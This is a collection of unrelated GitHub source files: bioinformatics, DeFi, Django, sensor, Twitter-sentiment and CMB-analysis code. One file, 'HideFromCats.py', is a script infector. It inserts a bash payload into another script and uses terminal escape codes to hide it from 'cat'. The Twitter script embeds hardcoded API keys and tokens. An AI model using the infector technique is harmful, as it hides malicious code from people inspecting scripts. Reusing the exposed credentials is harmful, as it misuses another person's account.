index, read in enumerate(all_reads):\n kmerIndicesRead = kmersFunction(read, k)\n for readKmer in kmerIndicesRead:\n if readKmer == kmer:\n for starting_position in kmerIndicesRead[readKmer]:\n # print('readkmer: ', readKmer)\n # print('replacer: ', replacer)\n # print('hi')\n # print(len(all_reads[index]))\n # print(len(replacer))\n all_reads[index] = read[:starting_position] + replacer + read[starting_position+len(replacer):]\n # print(len(all_reads[index]))\n # print('bye')\n corrected_set.add(index)\n \n return sorted(list(corrected_set)), all_reads, kmerFreq\n except:\n print('error')\n return\n\n\ndef main():\n try:\n sys1 = sys.argv[1]\n sys2 = sys.argv[2]\n sys3 = sys.argv[3]\n sys4 = sys.argv[4]\n except:\n print('error: bad number of arguments')\n return\n try:\n indices, all_reads, _ = correctionFunc(sys1, sys2, sys3, sys4, True, None)\n\n print(*indices, sep = \",\")\n print('--------------------')\n for read in all_reads:\n print(read)\n except:\n print('')\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"aaronwangj/pr2","sub_path":"correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38953654965","text":"\"\"\"Enzyme vault ERC-20 helpers.\"\"\"\nfrom eth_typing import HexAddress\nfrom web3.contract import Contract\nfrom web3.contract.contract import ContractFunction\n\nfrom eth_defi.abi import encode_function_call\nfrom eth_defi.enzyme.deployment import EnzymeDeployment\nfrom eth_defi.enzyme.generic_adapter import execute_calls_for_generic_adapter\nfrom eth_defi.enzyme.vault import Vault\n\n\ndef prepare_transfer(enzyme: EnzymeDeployment, vault: Vault, generic_adapter: Contract, token: Contract, receiver: HexAddress | str, amount: int) -> ContractFunction:\n \"\"\"Prepare an ERC-20 transfer out from the Enzyme vault.\n\n - Tells the Enzyme vault to move away som etokes\n\n :param enzyme:\n Enzyme deploymeent\n\n :param vault:\n Vault that needs to perform the swap\n\n :param generic_adapter:\n GenericAdapter contract we use for swaps\n\n :param token:\n ERC-20 token we send\n\n :param receiver:\n The receiver of tokens\n\n :param amount:\n Token amount, raw\n\n :return:\n Transaction object that can be signed and executed\n \"\"\"\n\n # Prepare the swap parameters\n spend_asset_amounts = [amount]\n spend_assets = [token.address]\n incoming_assets = []\n min_incoming_assets_amounts = []\n\n # The vault performs a swap on Uniswap v2\n encoded_transfer = encode_function_call(token.functions.transfer, [receiver, amount])\n\n bound_call = execute_calls_for_generic_adapter(\n comptroller=vault.comptroller,\n external_calls=((token, encoded_transfer),),\n generic_adapter=generic_adapter,\n incoming_assets=incoming_assets,\n integration_manager=enzyme.contracts.integration_manager,\n min_incoming_asset_amounts=min_incoming_assets_amounts,\n spend_asset_amounts=spend_asset_amounts,\n spend_assets=spend_assets,\n )\n\n return bound_call\n","repo_name":"tradingstrategy-ai/web3-ethereum-defi","sub_path":"eth_defi/enzyme/erc20.py","file_name":"erc20.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":425,"dataset":"github-code","pt":"66"} +{"seq_id":"10193573830","text":"# https://www.acmicpc.net/problem/1965\r\nimport sys\r\n# sys.setrecursionlimit(int(1e9))\r\nsi = sys.stdin.readline\r\nmis = lambda: map(int, si().split())\r\nINF = float('inf')\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n\r\nif __name__ == '__main__':\r\n n = int(si())\r\n B = list(mis())\r\n \r\n dp = [1] * n\r\n ans = 0\r\n for i in range(1, n):\r\n for j in range(i):\r\n if B[j] < B[i]:\r\n dp[i] = max(dp[i], dp[j] + 1)\r\n ans = max(ans, dp[i])\r\n print(ans)","repo_name":"punkryn/problem-solving","sub_path":"백준/Silver/1965. 상자넣기/상자넣기.py","file_name":"상자넣기.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4143521733","text":"\nimport sys\nimport os\n\nimport gzip\n\nHOME = os.environ['HOME']\n\nFLYBASE_GENE_NAME_FILE = HOME + \"/data/Dmel/flybase/fbgn_annotation_ID_fb_2012_04.tsv.gz\"\n\n\ndef read_anno_id_to_flybase_gene_name():\n f = gzip.open(FLYBASE_GENE_NAME_FILE)\n\n anno2fb_dict = {}\n \n for line in f:\n line = line.rstrip()\n \n if line.startswith(\"#\") or line == \"\":\n continue\n\n words = line.split(\"\\t\")\n\n if len(words) < 3:\n sys.stderr.write(\"WARNING: skipping line: %s\\n\" % line)\n continue\n \n fb_name = words[1]\n anno_id = words[3]\n\n if len(words) > 4:\n additional_ids = words[4].split()\n else:\n additional_ids = []\n\n anno_id_list = additional_ids + [anno_id]\n\n if fb_name:\n for a_id in anno_id_list:\n if a_id in anno2fb_dict:\n sys.stderr.write(\"WARNING: repeated annotation id: %s\\n\" %\n a_id)\n else:\n anno2fb_dict[a_id] = fb_name\n\n # sys.stderr.write(\"'%s' => '%s'\\n\" % (anno_id, fb_name))\n\n\n return anno2fb_dict\n \n\n\ndef main():\n if len(sys.argv) != 2:\n sys.stderr.write(\"usage: %s \\n\" %\n sys.argv[0])\n exit(2)\n \n anno2fb_dict = read_anno_id_to_flybase_gene_name()\n\n\n input_file = sys.argv[1]\n f = open(input_file)\n header = f.readline()\n if header.startswith(\"CG\"):\n # doesn't look like a header\n f.rewind()\n else:\n sys.stdout.write(header)\n \n for line in f:\n words = line.rstrip().split(None, 1)\n anno_id = words[0]\n\n anno_id = anno_id.split(\"-\")[0]\n \n if anno_id in anno2fb_dict:\n fb_name = anno2fb_dict[anno_id]\n sys.stdout.write(\"%s %s\\n\" % (fb_name, words[1]))\n else:\n sys.stdout.write(line)\n sys.stderr.write(\"could not find fbname for '%s'\\n\" % anno_id)\n \n \n\n\n\nmain()\n","repo_name":"gmcvicker/Dmel","sub_path":"python/annotation_id_to_flybase_gene_name.py","file_name":"annotation_id_to_flybase_gene_name.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3419847030","text":"from django.urls import path\n\nfrom admin.employee.manage import views\n\nurlpatterns = [\n path(\n '/accesslog',\n views.AccessLog.as_view(),\n name='accesslog'\n ),\n\n path(\n 'create',\n views.Create.as_view(),\n name='create'\n ),\n\n path(\n '/delete',\n views.Delete.as_view(),\n name='delete'\n ),\n\n path(\n '/edit',\n views.Edit.as_view(),\n name='edit'\n ),\n\n path(\n '/permission',\n views.Permission.as_view(),\n name='permission'\n ),\n\n path(\n 'permission/base',\n views.PermissionBase.as_view(),\n name='permission-base'\n ),\n\n path(\n 'permission/user',\n views.PermissionUser.as_view(),\n name='permission-user'\n ),\n\n path(\n 'search',\n views.Search.as_view(),\n name='search'\n )\n]\n","repo_name":"gwhcp/api","sub_path":"gwhcp_api/admin/employee/manage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74840367571","text":"#!/usr/bin/python\nimport sys\nprint(\"HideFromCats - created by [GrzechuG/BlueHat139]\")\n\nif len(sys.argv)!=3:\n print(\"Usage: python HideFromCats.py [virus_bash] [script_to_infect]\")\n quit()\nvirus = sys.argv[1]\nfile = sys.argv[2]\npayload = \"\"\nwith open(virus, \"r\") as f:\n for line in f:\n line = line.replace(\"\\n\", \"\")\n payload = payload+line+\";\"\npayload = payload+\"exit\"\ninfected = \"\"\nwith open (file, \"r\") as f:\n for line in f:\n infected = infected+line\n if \"#!\" in line:\n infected = infected+\"\"+payload+\"\\n\\n\"+'\\033[A\\033[A'+\" \"*len(payload)+\"\\n\"\nwith open(\"infected.out\", \"w+\") as f:\n f.write(infected)\n\nprint(\"Created infected script as infected.out!\")\n\n \n \n \n","repo_name":"GrzechuG/HideFromCats","sub_path":"HideFromCats.py","file_name":"HideFromCats.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"19098458376","text":"import time\n\nfrom depth_sensor import DepthSensor\n\n\nclass DSController:\n\n def __init__(self):\n self.ds = DepthSensor()\n self.ds.init()\n self.temp = 0\n self.pressure = 0\n self.depth = 0\n\n def set_ref(self):\n self.ds.set_ref_p()\n\n def read_temperature(self):\n self.temp = self.ds.read_temperature()\n return self.temp\n\n def read_pressure(self, it=3):\n p = 0\n for i in range(it):\n p += self.ds.read_pressure()\n self.pressure = p / it\n return self.pressure\n\n def read_depth(self, it=3):\n d = 0\n for i in range(it):\n d += self.ds.read_depth()\n self.depth = d / it\n return self.depth\n\n\nif __name__ == '__main__':\n ds = DSController()\n while True:\n print(\"Depth %.2f m\" % ds.read_depth())\n time.sleep(0.2)\n","repo_name":"knr-auv/odroid-v2","sub_path":"DepthSensor/ds_controller.py","file_name":"ds_controller.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25167222047","text":"#Al:leia n valores com parada no 999, mostrar a soma dos valores digitados e quantos valores foram figitados\n#autor: Lucas Borguezam\n#data:\n\n#Import\n\n#Inicio\ni = acu = v =0\n\nwhile True:\n v = int(input(\"Digite o valor desejado(código de parada 999)\"))\n if v == 999:\n break\n i += 1\n acu += v\nprint(f\"A soma é {acu} de {i} números digitados\")\n#fim\n","repo_name":"luscaborguezam/Aprendendo_Python","sub_path":"Exercicios_M1_M2/desafio66.py","file_name":"desafio66.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40706851344","text":"# importing the required modules\nimport tweepy\n\n# Getting the API from the my twitter account using tweepy\ndef get_twitter_api( ):\n # Consumer key, consumer secret, access token and access secret\n # from twitter application\n consumer_key = \"bDa4E2lGtdIG5nd3bvDinpThH\"\n consumer_secret = \"KNF61HTnZMWJjizkwNo6tznmYcEB8zEUo9V0bjs8Lf9fKRVw6x\"\n access_token = \"863437146077581312-Zl4aeEog8hoZ5W3e0Q5DjRYlUTvy7JN\"\n access_token_secret = \"Ho4fz2AEckYc6BaXHVs1OuRyzAJdxADcbVmGqKa63UUBx\"\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n return api\n\n# Analysing the words form the tweets and returning number of positive and negative words.\ndef wordanalysis ( pos_words, neg_words, celeb_tweets ):\n pos = 0\n neg = 0\n celeb_word = celeb_tweets.split(\" \")\n for i in celeb_word:\n if i in pos_words:\n pos += 1\n elif i in neg_words:\n neg += 1\n return pos, neg\n\n#Analysing the celebrity details from tweets\ndef tweetanalysis( celeb_data ):\n api = get_twitter_api()\n pos_file = open(\"pos_word.txt\",'r')\n neg_file = open(\"neg_word.txt\",'r')\n pos_word = (pos_file.read()).split(\"\\n\")\n neg_word = (neg_file.read()).split(\"\\n\")\n for i in range(len(celeb_data)):\n positive = 0\n negative = 0\n celeb_tweets = api.search(celeb_data[i][\"Name\"], lang=\"en\", locale=\"en\", count = 50 )\n for tweets in celeb_tweets:\n p,n = wordanalysis( pos_word, neg_word, tweets.text )\n positive += p\n negative += n\n if positive > negative :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"POSITIVE\"\n elif negative > positive :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"NEGATIVE\"\n elif positive == negative :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"NEUTRAL\"\n return celeb_data\n","repo_name":"carthi123/python_twitter","sub_path":"tweetanalysis.py","file_name":"tweetanalysis.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29535566477","text":"#adding positional index to support phrase queries\n#Using (1)+(2) processed data\n\n#creating positional index list\nimport Img_TFIDF\nimport query_search\n\npositional_index = {}\ndata_token = Img_TFIDF.noiseless_img_token\nfor key, value in data_token.items():\n d = {}\n i = 0\n for data in value: \n i += 1\n if data in d:\n d[data].append(i)\n else: \n d[data] = [i]\n\n positional_index[key] = d\n\n#query search engine\ndef Pos_query_search(phrase):\n phrase_list = query_search.pre_process_query(phrase)\n positional_index_allquery = {}\n img_list_allquery = []\n\n for key, value in positional_index.items():\n l = []\n for query in phrase_list:\n if query in value: \n l.append(value[query])\n\n if(len(phrase_list) == len(l)):\n query1 = l[0]\n n = len(l)\n\n for data in query1:\n count = 0 \n for i in range(1, n):\n for j in range(5): \n if data+i+j in l[i]:\n count += 1\n break\n if(count == n-1):\n img_list_allquery.append(key)\n break\n \n #printing songs keys of matched songs\n print(img_list_allquery)\n images =img_list_allquery[:10]\n return images\n","repo_name":"Harman-tamu/SnapQuest","sub_path":"positional_search.py","file_name":"positional_search.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31527785816","text":"# achterhalen van alle gebruikte grondsoortnamen in de boringen\n\nimport os\nfrom pathlib import Path\nfrom geoprofielen.helpers import case_insensitive_glob\nfrom geoprofielen.settings import ROOT_DIR\nfrom geoprofielen.objects.borehole import Borehole\nfrom tqdm import tqdm\n\nf = open(os.path.join(ROOT_DIR,\"./data/boringen/unknown_borehole_codes.csv\"), 'w')\nf_errors = open(os.path.join(ROOT_DIR,\"./data/boringen/borehole_read_errors.csv\"), 'w')\nf_coords = open(\"./data/boringen/boreholecoords.csv\", 'w')\n\n\nif __name__ == \"__main__\":\n sfiles = case_insensitive_glob(os.path.join(ROOT_DIR, \"data/boringen\"), \".gef\")\n \n for sfile in tqdm(sfiles):\n borehole = Borehole() \n try:\n borehole.read(str(sfile)) \n except Exception as e:\n f_errors.write(f\"Error reading {sfile} with error {e}.\\n\")\n continue\n\n try:\n borehole.convert()\n borehole.plot(filepath=\"./data/boringen\", filename=f\"{sfile.stem}.png\")\n f_coords.write(f\"{borehole.x},{borehole.y},{Path(borehole.filename).stem}\\n\")\n except Exception as e:\n f.write(f\"{e}\\n\")\n\nf.close()\nf_errors.close()\nf_coords.close()\n \n","repo_name":"breinbaas/geoprofielen","sub_path":"geoprofielen/plotallboreholes.py","file_name":"plotallboreholes.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19908363142","text":"import operator\n\noperations_dict = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv,\n}\noperations = ['+','-','*','/','=']\n\n\nmatrix1 = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\n\nmatrix2 = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\n\ninput_operator = '*'\n\ndef matsum(m1, m2, operation):\n if operation in '+-':\n operation_f = operations_dict[operation]\n\n if len(m1) == len(m2):\n result = [[operation_f(m1[i][j], m2[i][j]) for j in range(len(m1[i]))] for i in range(len(m1))]\n return result\n\n if operation == '*':\n multarr = [[sum(a*b for a,b in zip(m1_row,m2_col)) for m2_col in zip(*m2)] for m1_row in m1]\n\n return multarr","repo_name":"armensanoyan/gasianElimination","sub_path":"gaus_app/utils/g_distribution.py","file_name":"g_distribution.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26407395070","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport argparse\n\nimport healpy as hp\nfrom astropy.io import fits\nfrom pixell import curvedsky, enplot, utils\n\nfrom optweight import sht, map_utils, mat_utils, solvers, operators, preconditioners\n\nopj = os.path.join\nnp.random.seed(39)\n\ndef get_planck_b_ell(rimo_file, lmax):\n '''\n Return b_ell.\n\n Parameters\n ----------\n rimo_file : str\n Path to RIMO beam file.\n lmax : int\n Truncate to this lmax.\n \n Returns\n -------\n b_ell : (npol, nell)\n '''\n \n with fits.open(rimo_file) as hdul: \n b_ell_T = hdul[1].data['T']\n b_ell_E = hdul[1].data['E']\n b_ell_B = hdul[1].data['B']\n \n b_ell = np.zeros((3, lmax+1))\n b_ell[0] = b_ell_T[:lmax+1]\n b_ell[1] = b_ell_E[:lmax+1]\n b_ell[2] = b_ell_B[:lmax+1]\n\n return b_ell\n\ndef main(basedir, draw_constr=False, test_conv=False, niter_cg=20, niter_mg=40,\n no_masked_prec=False, pol_mg=False, use_prec_harm=False, noise_scaling=None,\n no_beam=False, lmax_masked_cg=1500, write_steps=False):\n '''\n \n Parameters\n ----------\n basedir : str\n Output directory.\n draw_constr : bool, optional\n Draw constrained realization.\n test_conv : bool, optional\n Replace b with A(x) for know LCDM x.\n niter_cg : int, optional\n Number of CG steps with nested CG as masked prec.\n niter_mg : int, optional\n Number of CG steps with multigrid as masked prec.\n no_masked_prec : bool, optional\n Do not use the preconditioners for masked pixels.\n pol_mg : bool, optional\n Use the multigrid precondioner for polarization as well\n use_prec_harm : bool, optional\n Use the harmonic preconditioner instead of the pseudo inverse.\n noise_scaling : float, optional\n Scale noise covariance by this number.\n no_beam : bool, optional\n Turn off the beam.\n lmax_masked_cg : int, optional\n Lmax used for nested masked cg preconditioner.\n write_steps : bool, optional\n Write CG steps to disk as alms.\n '''\n \n if test_conv:\n draw_constr = True\n\n lmax = 2500\n\n #maskdir = '/home/adriaand/project/actpol/20201009_pcg_planck/meta'\n maskdir = '/mnt/home/aduivenvoorden/project/actpol/20201009_pcg_planck/meta'\n imgdir = opj(basedir, 'img')\n odir = opj(basedir, 'out')\n\n utils.mkdir(imgdir)\n utils.mkdir(odir)\n\n # Load II, IQ, IU, QQ, QU, UU cov.\n cov = hp.read_map(opj(maskdir, 'HFI_SkyMap_100_2048_R3.01_full.fits'), field=(4, 5, 6, 7, 8, 9))\n cov *= 1e12 # Convert from K^2 to uK^2.\n\n if noise_scaling is not None:\n cov *= noise_scaling\n\n cov, minfo = map_utils.healpix2gauss(cov, 2*lmax, area_pow=-1)\n cov_pix = np.zeros((3, 3, cov.shape[-1]))\n cov_pix[0,0] = cov[0]\n cov_pix[0,1] = cov[1]\n cov_pix[0,2] = cov[2]\n cov_pix[1,0] = cov[1]\n cov_pix[1,1] = cov[3]\n cov_pix[1,2] = cov[4]\n cov_pix[2,0] = cov[2]\n cov_pix[2,1] = cov[4]\n cov_pix[2,2] = cov[5]\n\n # NOTE try thresholding low *cov* values.\n #cov_pix = map_utils.round_icov_matrix(cov_pix, rtol=1e-1, threshold=True)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(cov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]), interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'cov_real_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(np.log10(np.abs(cov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]))), interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'cov_real_log_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n icov_pix = mat_utils.matpow(cov_pix, -1)\n icov_pix = map_utils.round_icov_matrix(icov_pix, rtol=1e-2)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(np.log10(np.abs(icov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]))),\n interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'icov_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n mask_I = hp.read_map(opj(maskdir, 'COM_Mask_Likelihood-temperature-100-hm2_2048_R3.00.fits'), field=0)\n mask_I, _ = map_utils.healpix2gauss(mask_I[np.newaxis,:], 2*lmax, area_pow=0)\n mask_I[mask_I>=0.1] = 1\n mask_I[mask_I<0.1] = 0\n\n mask_P = hp.read_map(opj(maskdir, 'COM_Mask_Likelihood-polarization-100-hm2_2048_R3.00.fits'), field=0)\n mask_P, _ = map_utils.healpix2gauss(mask_P[np.newaxis,:], 2*lmax, area_pow=0)\n mask_P[mask_P>=0.1] = 1\n mask_P[mask_P<0.1] = 0\n\n print('fsky T', np.sum(map_utils.inv_qweight_map(mask_I, minfo, qweight=True)) / 4 / np.pi)\n print('fsky P', np.sum(map_utils.inv_qweight_map(mask_P, minfo, qweight=True)) / 4 / np.pi)\n\n mask_gl = np.zeros((3, mask_I.shape[-1]))\n mask_gl[0] = mask_I\n mask_gl[1] = mask_P\n mask_gl[2] = mask_P\n\n # Load beam.\n b_ell = get_planck_b_ell(opj(maskdir, 'BeamWf_HFI_R3.01', 'Bl_TEB_R3.01_fullsky_100x100.fits'), lmax)\n if no_beam:\n b_ell = np.ones_like(b_ell)\n\n # Preprare spectrum. Input file is Dls in uk^2.\n c_ell = np.loadtxt(\n opj(maskdir, 'COM_PowerSpect_CMB-base-plikHM-TTTEEE-lowl-lowE-lensing-minimum-theory_R3.01.txt'),\n skiprows=1, usecols=[1, 2, 3, 4]) # TT, TE, EE, BB.\n c_ell = c_ell.T\n ells = np.arange(lmax + 1)\n dells = ells * (ells + 1) / 2 / np.pi\n cov_ell = np.zeros((3, 3, lmax + 1))\n cov_ell[0,0,2:] = c_ell[0,:lmax-1] \n cov_ell[0,1,2:] = c_ell[1,:lmax-1] \n cov_ell[1,0,2:] = c_ell[1,:lmax-1] \n cov_ell[1,1,2:] = c_ell[2,:lmax-1] \n cov_ell[2,2,2:] = c_ell[3,:lmax-1] \n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True)\n for idxs, ax in np.ndenumerate(axs):\n axs[idxs].plot(cov_ell[idxs])\n fig.savefig(opj(imgdir, 'cov_ell'))\n plt.close(fig)\n\n cov_ell[...,1:] /= dells[1:]\n\n icov_ell = np.ones((3, 3, lmax + 1))\n for lidx in range(icov_ell.shape[-1]):\n if lidx < 2:\n # Set monopole and dipole to zero.\n icov_ell[:,:,lidx] = 0\n else:\n icov_ell[:,:,lidx] = np.linalg.inv(cov_ell[:,:,lidx])\n\n # Draw alms.\n alm, ainfo = curvedsky.rand_alm(cov_ell, return_ainfo=True)\n\n if not test_conv:\n for pidx in range(alm.shape[0]):\n hp.almxfl(alm[pidx], b_ell[pidx], inplace=True)\n # Draw map-based noise and add to alm.\n noise = map_utils.rand_map_pix(cov_pix)\n alm_noise = alm.copy()\n sht.map2alm(noise, alm_noise, minfo, ainfo, [0,2], adjoint=False)\n nl = ainfo.alm2cl(alm_noise[:,None,:], alm_noise[None,:,:])\n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True)\n for idxs, ax in np.ndenumerate(axs):\n axs[idxs].plot(nl[idxs])\n fig.savefig(opj(imgdir, 'n_ell'))\n plt.close(fig)\n\n if not test_conv:\n \n imap = np.zeros((3, minfo.npix))\n sht.alm2map(alm, imap, ainfo, minfo, [0, 2])\n imap += noise \n imap *= mask_gl\n\n niter = niter_cg + niter_mg\n\n ps_c_ell = np.zeros((niter, 3, 3, lmax + 1))\n cg_errors = np.zeros(niter + 1)\n chisqs = np.zeros(niter + 1)\n errors = np.zeros((4, niter + 1)) # Total, I, E, B.\n residuals = np.zeros(niter + 1)\n times = np.zeros(niter)\n qforms = np.zeros(niter)\n\n solver = solvers.CGWienerMap.from_arrays(imap, minfo, ainfo, icov_ell, icov_pix, minfo, b_ell=b_ell,\n draw_constr=draw_constr, mask_pix=mask_gl, spin=[0, 2],\n swap_bm=True)\n \n prec_pinv = preconditioners.PseudoInvPreconditioner(\n ainfo, icov_ell, icov_pix, minfo, [0, 2], b_ell=b_ell)\n\n prec_harm = preconditioners.HarmonicPreconditioner(\n ainfo, icov_ell, b_ell=b_ell, icov_pix=icov_pix, minfo=minfo)\n\n prec_masked_cg = preconditioners.MaskedPreconditionerCG(\n ainfo, icov_ell, [0, 2], mask_gl.astype(bool), minfo, lmax=lmax_masked_cg, \n nsteps=15, lmax_r_ell=None)\n\n if pol_mg:\n prec_masked_mg = preconditioners.MaskedPreconditioner(\n ainfo, icov_ell, [0, 2], mask_gl[0].astype(bool), minfo,\n min_pix=10000, n_jacobi=1, lmax_r_ell=6000)\n else:\n print('normal mg')\n prec_masked_mg = preconditioners.MaskedPreconditioner(\n ainfo, icov_ell[0:1,0:1], 0, mask_gl[0].astype(bool), minfo,\n min_pix=10000, n_jacobi=1, lmax_r_ell=6000)\n\n if use_prec_harm:\n solver.add_preconditioner(prec_harm)\n else:\n print('normal pinv')\n solver.add_preconditioner(prec_pinv)\n\n if not no_masked_prec:\n print('normal cg')\n solver.add_preconditioner(prec_masked_cg)\n solver.init_solver()\n\n if test_conv:\n print('test_conv')\n # Replace b with A(x) such that we can compute error.\n solver.b_vec = solver.A(alm)\n solver.b0 = solver.b_vec.copy()\n solver.init_solver()\n\n cg_errors[0] = 1\n #chisqs[0] = solver.get_chisq()\n errors[0,0] = np.sqrt(solver.dot(alm, alm))\n errors[1,0] = np.sqrt(solver.dot(alm[0], alm[0]))\n errors[2,0] = np.sqrt(solver.dot(alm[1], alm[1]))\n errors[3,0] = np.sqrt(solver.dot(alm[2], alm[2]))\n residuals[0] = solver.get_residual()\n \n for idx in range(niter_cg):\n t0 = time.time()\n solver.step()\n dt = time.time() - t0 \n if write_steps:\n hp.write_alm(opj(odir, f'alm_x_{idx}.fits'), solver.get_wiener(),\n overwrite=True)\n residual = solver.get_residual()\n #chisq = solver.get_chisq() \n diff = solver.x - alm\n \n cg_errors[idx+1] = solver.err\n errors[0,idx+1] = np.sqrt(solver.dot(diff, diff))\n errors[1,idx+1] = np.sqrt(solver.dot(diff[0], diff[0]))\n errors[2,idx+1] = np.sqrt(solver.dot(diff[1], diff[1]))\n errors[3,idx+1] = np.sqrt(solver.dot(diff[2], diff[2]))\n residuals[idx+1] = residual\n #chisqs[idx+1] = chisq\n times[idx] = dt\n qforms[idx] = solver.get_qform()\n ps_c_ell[idx,...] = ainfo.alm2cl(solver.x[:,None,:], solver.x[None,:,:])\n \n #print(f'{solver.i}, cg_err : {solver.err}, chisq : {chisq}, residual : {residual}, '\n # f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n # f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n print(f'{solver.i}, cg_err : {solver.err}, residual : {residual}, '\n f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n\n solver.reset_preconditioner()\n if use_prec_harm:\n solver.add_preconditioner(prec_harm)\n else:\n print('normal pinv 2')\n solver.add_preconditioner(prec_pinv)\n\n if not no_masked_prec:\n if pol_mg:\n solver.add_preconditioner(prec_masked_mg)\n else:\n print('normal mg 2')\n solver.add_preconditioner(prec_masked_mg, sel=np.s_[0])\n solver.b_vec = solver.b0\n solver.init_solver(x0=solver.x)\n\n for idx in range(niter_cg, niter_cg + niter_mg):\n\n t0 = time.time()\n solver.step()\n dt = time.time() - t0 \n if write_steps:\n hp.write_alm(opj(odir, f'alm_x_{idx}.fits'), solver.get_wiener(),\n overwrite=True)\n residual = solver.get_residual()\n #chisq = solver.get_chisq() \n diff = solver.x - alm\n \n cg_errors[idx+1] = solver.err * cg_errors[niter_cg]\n errors[0,idx+1] = np.sqrt(solver.dot(diff, diff))\n errors[1,idx+1] = np.sqrt(solver.dot(diff[0], diff[0]))\n errors[2,idx+1] = np.sqrt(solver.dot(diff[1], diff[1]))\n errors[3,idx+1] = np.sqrt(solver.dot(diff[2], diff[2]))\n residuals[idx+1] = residual\n #chisqs[idx+1] = chisq\n times[idx] = dt\n qforms[idx] = solver.get_qform()\n ps_c_ell[idx,...] = ainfo.alm2cl(solver.x[:,None,:], solver.x[None,:,:])\n \n #print(f'{solver.i}, cg_err : {solver.err}, chisq : {chisq}, residual : {residual}, '\n # f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n # f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n print(f'{solver.i}, cg_err : {solver.err}, residual : {residual}, '\n f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n\n np.save(opj(odir, 'ps_c_ell'), ps_c_ell)\n np.save(opj(odir, 'n_ell'), nl)\n np.save(opj(odir, 'cov_ell'), cov_ell)\n np.save(opj(odir, 'b_ell'), b_ell)\n np.save(opj(odir, 'cg_errors'), cg_errors)\n np.save(opj(odir, 'errors'), errors)\n np.save(opj(odir, 'residuals'), residuals)\n np.save(opj(odir, 'times'), times)\n #np.save(opj(odir, 'chisqs'), chisqs)\n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True, squeeze=False)\n for ax in axs.ravel():\n ax.set_prop_cycle('color',[plt.cm.plasma(i) for i in np.linspace(0, 1, niter)])\n for idx in range(niter):\n for aidxs, ax in np.ndenumerate(axs):\n axs[aidxs].plot(ells, dells * ps_c_ell[idx,aidxs[0],aidxs[1]],\n lw=0.5)\n for aidxs, ax in np.ndenumerate(axs):\n axs[aidxs].plot(ells, dells * cov_ell[aidxs[0],aidxs[1]], lw=0.5, color='black', ls=':')\n axs[0,0].set_ylim(0, 1e4)\n fig.savefig(opj(imgdir, 'ps_c_ell'))\n plt.close(fig)\n\n for idxs, ax in np.ndenumerate(axs):\n if idxs[0] == idxs[1]:\n 